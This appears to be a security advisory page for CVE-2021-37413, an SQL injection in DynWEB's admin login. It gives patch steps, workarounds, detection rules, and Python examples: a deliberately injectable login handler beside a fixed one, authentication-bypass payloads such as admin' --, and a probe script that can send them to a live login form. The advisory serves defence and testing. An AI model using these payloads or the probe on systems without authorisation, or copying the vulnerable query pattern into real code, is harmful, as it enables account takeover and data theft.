CVE-2021-37413
📋 TL;DR
CVE-2021-37413 is a critical SQL injection vulnerability in the admin login interface of GRANDCOM DynWEB. An unauthenticated attacker who can reach the login form can inject SQL into the authentication query, bypass authentication and run arbitrary SQL against the application database; with administrative access the attacker also reaches the admin panel's file upload features. Every installation of an affected version whose admin login is reachable is exposed.
💻 Affected Systems
- GRANDCOM DynWEB
📦 What is this software?
DynWEB by GRANDCOM (https://www.grandcom.sk)
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the web application: administrative access, exfiltration of all user data, defacement of web content, and server takeover through the admin file upload (web shell), which can in turn lead to ransomware deployment or a wider data breach.
Likely Case
Administrative account takeover leading to website defacement, theft of the user database, and lateral movement from the web server into the rest of the network.
If Mitigated
Limited impact if the admin login is reachable only from trusted networks and a WAF and IDS filter the obvious injection syntax. A WAF alone can be bypassed with encoded or obfuscated payloads, so treat it as a stop-gap, not a fix.
🎯 Exploit Status
SQL injection in a login form is a well-understood, fully automated attack class (sqlmap and similar tools find and exploit it without manual effort). No credentials are needed, so every exposed instance is a target for mass scanning. This page references no public exploit specific to DynWEB.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: DynWEB 4.2 and later
Vendor: https://www.grandcom.sk
Restart Required: Yes
Instructions:
1. Download DynWEB version 4.2 or later from the vendor website.
2. Back up the current installation and the database before upgrading.
3. Install the updated version following the vendor's instructions.
4. Restart the web application service.
5. Confirm the version now reads 4.2 or later and that the admin login interface works with valid credentials.
🔧 Temporary Workarounds
Web Application Firewall (WAF)
Deploy a WAF with SQL injection rules in front of the admin login. This stops textbook payloads but not every encoding or obfuscation, so it buys time rather than closing the hole.
Network Access Control
Restrict access to the admin login interface to trusted source addresses. The host-level iptables rules below do this for the whole site (ports 80 and 443), which is only acceptable when the site itself is internal; on a public site, allowlist only the admin path in the web server configuration instead. The rules are appended with -A, so they have no effect if an earlier rule already accepts the port: insert them ahead of it (or use -I), replace trusted_ip with your management address or range, and add matching ip6tables rules on dual-stack hosts.
iptables -A INPUT -p tcp --dport 80 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
🧯 If You Can't Patch
- If you maintain the source, replace string-concatenated SQL in the login handler with prepared statements (parameterized queries). Input validation is a useful extra layer but is not a fix on its own.
- Disable the admin login interface if it is not needed, or put it behind an additional authentication layer (HTTP basic auth, VPN). Renaming the path only slows attackers down.
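The following is an added example, not DynWEB's code: a login handler built the injectable way (username spliced into the SQL string) next to the parameterized form the workaround above calls for. The table schema, column names, sample admin account and SHA-256 hashing are constructed for illustration; the probes run against an in-memory SQLite database. The bare ' OR '1'='1 probe is included to show that it fails when a password check is ANDed after it, which is why testers also try a payload with a trailing comment.

```python
"""Login handler with a string-built SQL query, beside a parameterized one.
Added example, not DynWEB's code; schema, column names and hashing are
constructed for illustration."""
import hashlib
import hmac
import sqlite3
from typing import Callable, Optional

ADMIN_USER = "admin"                       # constructed sample account
ADMIN_PASSWORD = "correct horse battery staple"


def _hash(password: str) -> str:
    # SHA-256 keeps the example dependency-free; a real login store should
    # use a slow salted scheme (argon2id, bcrypt or scrypt) instead.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with one admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 (ADMIN_USER, _hash(ADMIN_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """The injectable pattern: the username is spliced into the SQL text, so a
    quote in it ends the string literal and the remainder runs as SQL."""
    query = ("SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
             % (username, _hash(password)))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Parameterized lookup: the driver binds the username as data, never as SQL.
    The hash comparison happens in Python with a constant-time compare."""
    row = conn.execute("SELECT username, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], _hash(password)):
        return None
    return row[0]


# Probes a tester would send in the username field, each with a wrong password.
PAYLOADS = {
    "bare_or": "' OR '1'='1",         # AND binds tighter than OR, so the password
                                      # check still applies and this one fails
    "or_comment": "' OR '1'='1' --",  # the comment removes the password check
    "admin_comment": "admin' --",     # targets the admin row directly
}


def probe(login: Callable[[sqlite3.Connection, str, str], Optional[str]]) -> dict:
    """Run every payload plus one valid login; returns probe name -> user logged in."""
    conn = make_db()
    results = {name: login(conn, payload, "wrong-password") for name, payload in PAYLOADS.items()}
    results["valid"] = login(conn, ADMIN_USER, ADMIN_PASSWORD)
    return results


if __name__ == "__main__":
    print("vulnerable:", probe(login_vulnerable))
    print("fixed:     ", probe(login_fixed))
```

Against login_vulnerable the two comment payloads log in as admin without a password; against login_fixed only the valid credentials do. The fix is the placeholder, not escaping: the database driver receives the username as a bound value and never parses it as SQL.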
🔍 How to Verify
Check if Vulnerable:
Only on systems you are authorised to test, and preferably on a staging copy: submit SQL injection payloads such as ' OR '1'='1 or admin' -- in the username (and password) fields of the admin login form. A payload with a trailing comment is the more reliable probe, because the bare OR can still be defeated by a password check ANDed after it. If any payload logs you in, or the response differs clearly from a plain wrong-password attempt, the system is vulnerable. A probe that fails does not prove the system is fixed; the version check below is authoritative.
Check Version:
Check the DynWEB administration panel or configuration files for version information. Typically found in /admin/ or web interface footer.
Verify Fix Applied:
Re-run the same probes after patching: each should be rejected exactly like any wrong credential pair, and only valid credentials should log in. Also confirm the version string reads 4.2 or later.
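An added example of the verification step, not a vendor tool or DynWEB code: it sends each probe to the login URL and compares the response with a baseline request using random wrong credentials. The form field names (username/password), the URL and the stand-in transport are assumptions; the stand-in imitates an injectable login so the script runs offline, and http_post is the transport to pass for a real (authorised) test.

```python
"""Black-box probe of a login form for the authentication bypass described above.
Added example, not DynWEB's code or a vendor tool. The form field names, the
payloads and the stand-in transport are assumptions; run it only against
systems you are authorised to test."""
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

PAYLOADS = ["' OR '1'='1", "' OR '1'='1' --", "admin' --"]

# (status, Location header, Set-Cookie present): the signals a login changes.
Response = Tuple[int, str, bool]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them; the redirect is the signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_post(url: str, fields: Dict[str, str]) -> Response:
    """Real transport: one form POST, redirects not followed."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location", ""), "Set-Cookie" in resp.headers
    except urllib.error.HTTPError as err:  # 3xx (unfollowed) and 4xx/5xx land here
        return err.code, err.headers.get("Location", ""), "Set-Cookie" in err.headers


def probe_login(url: str, transport: Callable[[str, Dict[str, str]], Response] = http_post,
                user_field: str = "username", pass_field: str = "password") -> Dict[str, bool]:
    """Differential test: a payload is suspicious when the server answers it
    differently from a plainly wrong credential pair (other status, redirect
    target or session cookie behaviour). Returns payload -> suspicious."""
    baseline = transport(url, {user_field: "nouser_" + secrets.token_hex(4),
                               pass_field: secrets.token_hex(8)})
    return {p: transport(url, {user_field: p, pass_field: "x"}) != baseline for p in PAYLOADS}


def simulated_vulnerable_app(url: str, fields: Dict[str, str]) -> Response:
    """Constructed stand-in for an injectable login so the probe runs offline:
    a quote followed by a comment strips the password check, as in the bug class."""
    username = fields["username"]
    if "'" in username and "--" in username:
        return 302, "/admin/", True   # redirect into the admin area with a session
    return 200, "", False             # login form rendered again


if __name__ == "__main__":
    # Hypothetical URL; swap in the real admin login and transport=http_post for a live test.
    print(probe_login("http://dynweb.example/admin/login", transport=simulated_vulnerable_app))
```

A True entry means the server treated the injected value differently from garbage credentials, which is the condition to investigate; it is not by itself proof of a shell. Pages that embed per-request tokens can still answer 200 both ways, so if every probe reads False, confirm with the version check rather than assuming the fix.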
📡 Detection & Monitoring
Log Indicators:
- Multiple failed admin login attempts whose form values contain a quote followed by SQL syntax (' OR, ' --, UNION SELECT). Match on the syntax, not on bare keywords: OR and -- on their own also occur in ordinary usernames and passwords.
- Successful admin logins from unusual IP addresses
- Unusual database query patterns in application logs
Network Indicators:
- HTTP POST requests to the admin login endpoint whose bodies contain URL-encoded injection syntax (%27 for the quote, followed by OR, --, # or UNION)
- Unusual outbound database connections from web server
SIEM Query:
source="web_logs" AND http_method="POST" AND (uri_path="/admin/login" OR uri_path="/admin/authenticate") AND (request_body LIKE "%'%OR%'1'='1%" OR request_body LIKE "%'--%" OR request_body LIKE "%'#%" OR request_body LIKE "%UNION%SELECT%")
The login paths are placeholders; substitute the endpoint of your deployment. URL-decode request_body before matching (the quote arrives as %27, spaces as +), and anchor comment and OR matches on a preceding quote so that ordinary values such as "pass--word" do not fire.
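The log indicators above, as an added example that is not part of the original page or any SIEM product: a scanner over constructed JSON-lines request logs that URL-decodes each form field of POSTs to the admin login paths, matches SQL syntax rather than bare keywords, and counts attempts per source address. The log format, the endpoint names and the sample entries are assumptions; the "302 means a successful login" rule is an assumption about the application that should be checked against your own logs.

```python
"""Flag SQL-injection attempts against the admin login in request logs.
Added example, not DynWEB's or any SIEM's code. The log format, the login
paths and the sample entries are constructed for illustration."""
import json
import re
from collections import Counter
from urllib.parse import parse_qs

# Assumed endpoints; substitute the real admin login path of your deployment.
ADMIN_LOGIN_PATHS = {"/admin/login", "/admin/authenticate"}

# Each pattern needs SQL syntax, not just a keyword, so "connor" does not trip
# the OR rule and "pass--word" does not trip the comment rule.
SQLI_PATTERNS = [
    ("quote_tautology", re.compile(r"""['"]\s*or\s+['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
    ("quote_comment", re.compile(r"""['"]\s*(--|#|/\*)""")),
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("stacked_query", re.compile(r"""['"]\s*;""")),
    ("time_based", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I)),
]

# Constructed sample log (JSON lines). 203.0.113.7 is the attacker; the other
# entries are legitimate logins that a naive keyword match would also flag.
LOG_LINES = """
{"ts": "2021-08-12T09:14:02Z", "src_ip": "198.51.100.4", "method": "POST", "path": "/admin/login", "status": 302, "body": "username=editor&password=S3cret%21"}
{"ts": "2021-08-12T09:15:11Z", "src_ip": "203.0.113.7", "method": "POST", "path": "/admin/login", "status": 200, "body": "username=%27+OR+%271%27%3D%271&password=x"}
{"ts": "2021-08-12T09:15:13Z", "src_ip": "203.0.113.7", "method": "POST", "path": "/admin/login", "status": 302, "body": "username=%27+OR+%271%27%3D%271+--&password=x"}
{"ts": "2021-08-12T09:15:20Z", "src_ip": "203.0.113.7", "method": "POST", "path": "/admin/login", "status": 302, "body": "username=admin%27--&password=x"}
{"ts": "2021-08-12T09:16:40Z", "src_ip": "198.51.100.9", "method": "POST", "path": "/admin/login", "status": 200, "body": "username=connor&password=pass--word"}
{"ts": "2021-08-12T09:17:05Z", "src_ip": "203.0.113.7", "method": "GET", "path": "/admin/login", "status": 200, "body": ""}
"""


def classify_field(value: str):
    """Name of the first pattern matching a decoded form value, or None."""
    for name, rx in SQLI_PATTERNS:
        if rx.search(value):
            return name
    return None


def detect(log_text: str) -> list:
    """Scan JSON-lines request logs; one alert per injected form field."""
    alerts = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev["method"] != "POST" or ev["path"] not in ADMIN_LOGIN_PATHS:
            continue
        # parse_qs URL-decodes (%27 -> ', + -> space); matching the raw body misses this.
        for field, values in parse_qs(ev["body"], keep_blank_values=True).items():
            for value in values:
                reason = classify_field(value)
                if reason:
                    alerts.append({
                        "ts": ev["ts"], "src_ip": ev["src_ip"], "field": field,
                        "value": value, "reason": reason, "status": ev["status"],
                        # Assumption: this app redirects (302) after a successful login,
                        # so a redirect following an injected body means the bypass worked.
                        "severity": "high" if ev["status"] == 302 else "medium",
                    })
    return alerts


def count_by_source(alerts: list) -> dict:
    """Attempts per source address, for the "multiple attempts" indicator."""
    return dict(Counter(a["src_ip"] for a in alerts))


if __name__ == "__main__":
    found = detect(LOG_LINES)
    for alert in found:
        print(alert)
    print(count_by_source(found))
```

On the sample log this yields three alerts, all from 203.0.113.7, two of them marked high because the injected request was answered with a redirect; the legitimate logins (including the password containing a double dash) produce none. A high-severity hit is the trigger to check admin session and file upload activity from that address, not just to block it.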